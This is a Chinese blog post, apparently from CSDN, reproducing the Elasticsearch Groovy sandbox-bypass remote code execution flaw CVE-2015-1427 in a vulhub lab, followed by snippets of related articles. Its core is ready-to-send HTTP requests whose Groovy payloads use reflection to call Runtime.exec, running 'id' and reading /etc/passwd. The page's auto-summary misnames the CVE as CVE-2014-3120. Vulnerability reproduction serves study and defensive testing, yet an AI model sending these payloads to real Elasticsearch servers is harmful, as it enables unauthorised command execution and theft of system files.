ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境

最新推荐文章于 2024-08-11 13:41:03 发布
最新推荐文章于 2024-08-11 13:41:03 发布
阅读量336 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117410650
版权
本文详细介绍了CVE-2014-3120,这是一个Elasticsearch的安全漏洞,允许攻击者通过Groovy脚本执行任意命令。漏洞利用示例包括执行`id`命令和读取`/etc/passwd`文件。了解此漏洞对于网络安全和防止恶意攻击至关重要。
摘要由CSDN通过智能技术生成

漏洞背景

该漏洞可以参考我这篇文章CVE-2014-3120

漏洞复现

照例子先插入一条数据;

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

在这里插入图片描述

然后发送包含payload的数据包,执行任意命令id

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

在这里插入图片描述
当然也可以读文件:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 169

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}

在这里插入图片描述

小 白 萝 卜
关注
专栏目录
利用Vulnhub复现漏洞 - ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427测试环境
JiangBuLiu的博客
07-02 1135
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427测试环境Vulnhub官方复现教程漏洞原理Groovy语言“沙盒”复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/ 漏洞原理 参考文章: http://...
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 560
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
Elasticsearch简介
weixin_45439324的博客
12-09 185
Elasticsearch简介 简介 Lucene—基于Java的全文索引/检索引擎 Elasticsearch是一个基于Lucene库的搜索引擎。 它提供了一个分布式、支持多用户的全文搜索引擎,**具有HTTP Web接口和无模式JSON文档。**所有其他语言可以使用 RESTful API 通过端口 *9200* 和 Elasticsearch 进行通信 Elasticsearch是用Ja...
春秋云境:CVE-2015-1427[漏洞复现]
最新发布
如有错误感谢斧正
08-11 349
执行cat /flag命令,可以看到回显是Base64格式。执行whoami命令,可以看到响应体末尾已经出现回显。Payload:(上方双斜杠需要换成单斜杠)使用Yakit自带的Codec功能进行解码。
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427
黑白的博客
12-13 716
声明 好好学习,天天向上 漏洞描述 和3210的漏洞很像,也是恶意代码执行漏洞,3210是执行任意MVEL表达式和java代码,3210之后MVEL表达式被弃用,ES的动态脚本语言换成了Groovy(而且增加了sandbox),然额换成Groovy之后仍然存在恶意代码执行漏洞 影响范围 Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 复现过程 这里使用v1.4.2版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427
weixin_34292924的博客
03-08 338
lupin · 2015/03/04 15:17作者:京东安全团队 Lupin0x00 前言ElasticSearch是一个JAVA开发的搜索分析引擎。2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1141
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
CVE-2015-1427
weixin_34390105的博客
01-13 563
2019独角兽企业重金招聘Python工程师标准>>> ...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
ElasticSearch CVE-2015-1427漏洞详解与高级利用策略
本文将深入探讨Elasticsearch远程代码执行漏洞CVE-2015-1427的相关知识,该漏洞发生在2015年,影响范围广泛,尤其对使用Groovy语言的场景。漏洞的关键在于Elasticsearch安全策略低估了Groovy作为开发语言的能力,...
vulhub漏洞复现十三_elasticsearch
weixin_44193247的博客
01-20 544
vulhub漏洞复现练习篇
groovy-sandbox:(不建议使用)编译时转换器以在限制性沙箱中运行Groovy代码
05-03
Groovy沙盒 警告:此库仅在Jenkins的上下文中维护,并且仅应用作Jenkins插件的依赖项,例如和 。 出于所有其他目的,应将其视为已弃用且不安全。 该库提供了一个编译时转换器,可以在执行之前拦截大多数操作(例如方法调用)的环境中运行Groovy代码。 库的使用者可以参与拦截,以允许或拒绝特定操作。 当单独使用该库时,它是不安全的。 特别是,您必须至少沿着的行使用附加的CompilationCustomizer来拒绝可以绕过沙箱的AST转换,并且需要特别小心以确保在沙箱内部解析和执行不受信任的脚本。
【学习笔记】ElasticSearch Groovy 脚本远程代码执行漏洞(CVE-2015-1427)
chualam的博客
11-01 407
ES旧版本中使用MVEL作为脚本执行引擎 没有安全限制 因此可以构造任意java代码 CVE -2014 -3120 出了这个CVE后 又用groovy引擎了 防止恶意脚本执行 还用了沙盒的机制(因为沙盒限制不严格导致漏洞CVE-2015-1427 沙盒通过黑白名单检测可以说它是浅沙盒 如果黑名单禁用a() 白名单有b() 就用b()调用a() 通过一个类获取另一个类 通过getclass方法获取class对象反射调用类 替代品forname 利用它来调用java.lang.runtim
buuctf [ElasticSearch]CVE-2015-1427
qq_1873822的博客
03-24 591
漏洞描述 ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个 远程代码执行漏洞CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行Groovy语言“沙盒ElasticSearch支持使用“在沙盒中的”Groovy语言
CVE-2015-1427 ElasticSearchGroovy 沙盒绕过 && 代码执行漏洞
weixin_51387754的博客
11-17 2733
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 902
ElasticSearch 命令执行漏洞CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
春秋云镜 CVE-2015-1427
qq_22002773的博客
09-14 266
春秋云镜 CVE-2015-1427
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5562
春秋云镜CVE-2015-1427 ElasticSearch RCE
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 464
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值